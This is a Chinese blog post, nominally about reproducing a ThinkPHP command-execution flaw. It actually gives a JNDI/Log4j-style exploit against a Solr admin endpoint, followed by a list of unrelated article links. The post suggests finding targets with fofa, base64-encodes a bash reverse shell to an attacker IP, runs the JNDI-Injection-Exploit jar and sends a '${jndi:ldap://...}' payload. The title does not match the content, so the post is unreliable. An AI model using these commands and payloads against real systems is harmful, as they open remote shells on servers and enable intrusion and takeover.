当前位置: 首页 > news >正文

thinkphp之命令执行漏洞复现

news 来源:原创 2024/9/21 12:32:42

实战:

fofa搜索thinkphp--

第一步:先在dns平台上,点击Get SubDomain ,监控我们的注入效果

 

491f8115d0a117f057b0c64371d55fdf.png

 

4fbd04803681a3aa4a9f8affb3372fd4.png

返回dnslog查看到了Java的版本信息

 

125111dfdd47d12025e5a64204a2638c.png

打开kali监听端口

 

26b906f58698724f2e13893afa9fde2d.png

进行base64编码

bash -i >& /dev/tcp/192.168.189.150/8080 0>&1

我编码后的是

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4OS4xNTAvODA4MCAwPiYx

1151889eaa918292a9f3aa94ceceb5b0.png

复制语句、

# 命令模板
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,[经过base64编码后的命令1}|{base64,-d}|bash"-A 你的ypsipl
#我的命令语句是
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C"bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4OS4xNTAvODA4MCAwPiYx}|{base64,-d}|bash" -A 192.168.189.150
​

bd271b1714b5901586ba905a7582c18f.png

访问一下kali里面得到的1.8版本的ldmp:/solr/admin/cores?action=${jndi:ldap://192.168.189.150:1389/jj9zyn
}

kali里面就可以监听的到了

 

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • SpringBoot入门、进阶、强化、扩展、知识体系完善等知识点学习、性能优化、源码分析专栏分享
  • LLaMA- Adapter V2: Parameter-Efficient Visual Instruction Model
  • AI在招聘市场趋势分析中的应用
  • 完美解决pip命令版本冲突导致对应版本模块包无法安装的问题
  • PHP进阶-CentOS7部署LNMP服务架构的项目
  • Swift 析构过程
  • 初步认识vue
  • android studio 无法识别androidTest模块Test模块
  • Linux 内核源码分析---I/O 体系结构与访问设备
  • 【多线程-从零开始-伍】volatile关键字和内存可见性问题
  • OD C卷 - 多线段数据压缩
  • 【PCA提取主要特征通俗】
  • Unity 功能 之 创建 【Unity Package】 Manager 自定义管理的包使用配置URL,使用 git URL加载的简单整理
  • Java SpringBoot 集成 MinIO 资料
  • RabbitMq架构原理剖析及应用
  • ES学习笔记(10)--ES6中的函数和数组补漏
  • GitUp, 你不可错过的秀外慧中的git工具
  • Mocha测试初探
  • Python进阶细节
  • Redis 中的布隆过滤器
  • 机器学习学习笔记一
  • 前端代码风格自动化系列(二)之Commitlint
  • 问:在指定的JSON数据中(最外层是数组)根据指定条件拿到匹配到的结果
  • 吴恩达Deep Learning课程练习题参考答案——R语言版
  • ​Distil-Whisper:比Whisper快6倍,体积小50%的语音识别模型
  • #Datawhale AI夏令营第4期#AIGC文生图方向复盘
  • #NOIP 2014# day.2 T2 寻找道路
  • #stm32整理(一)flash读写
  • (01)ORB-SLAM2源码无死角解析-(66) BA优化(g2o)→闭环线程:Optimizer::GlobalBundleAdjustemnt→全局优化
  • (04)odoo视图操作
  • (1)(1.8) MSP(MultiWii 串行协议)(4.1 版)
  • (NO.00004)iOS实现打砖块游戏(九):游戏中小球与反弹棒的碰撞
  • (NO.00004)iOS实现打砖块游戏(十二):伸缩自如,我是如意金箍棒(上)!
  • (WSI分类)WSI分类文献小综述 2024
  • (二十三)Flask之高频面试点
  • (附源码)apringboot计算机专业大学生就业指南 毕业设计061355
  • (南京观海微电子)——I3C协议介绍
  • *算法训练(leetcode)第四十天 | 647. 回文子串、516. 最长回文子序列
  • .NET Core工程编译事件$(TargetDir)变量为空引发的思考
  • .NET 中使用 Mutex 进行跨越进程边界的同步
  • .Net高阶异常处理第二篇~~ dump进阶之MiniDumpWriter
  • @Async 异步注解使用
  • @javax.ws.rs Webservice注解
  • [ Socket学习 ] 第一章:网络基础知识
  • [000-002-01].数据库调优相关学习
  • [AIGC] 广度优先搜索(Breadth-First Search,BFS)详解
  • [AndroidStudio]_[初级]_[修改虚拟设备镜像文件的存放位置]
  • [Bada开发]初步入口函数介绍
  • [BZOJ 3531][Sdoi2014]旅行(树链剖分+线段树)
  • [BZOJ3223]文艺平衡树
  • [c]统计数字
  • [C++从入门到精通] 14.虚函数、纯虚函数和虚析构(virtual)
  • [CISCN2021 Quals]upload(PNG-IDAT块嵌入马)
  • [CTF夺旗赛] CTFshow Web1-12 详细过程保姆级教程~
  • [FC][常见Mapper IRQ研究]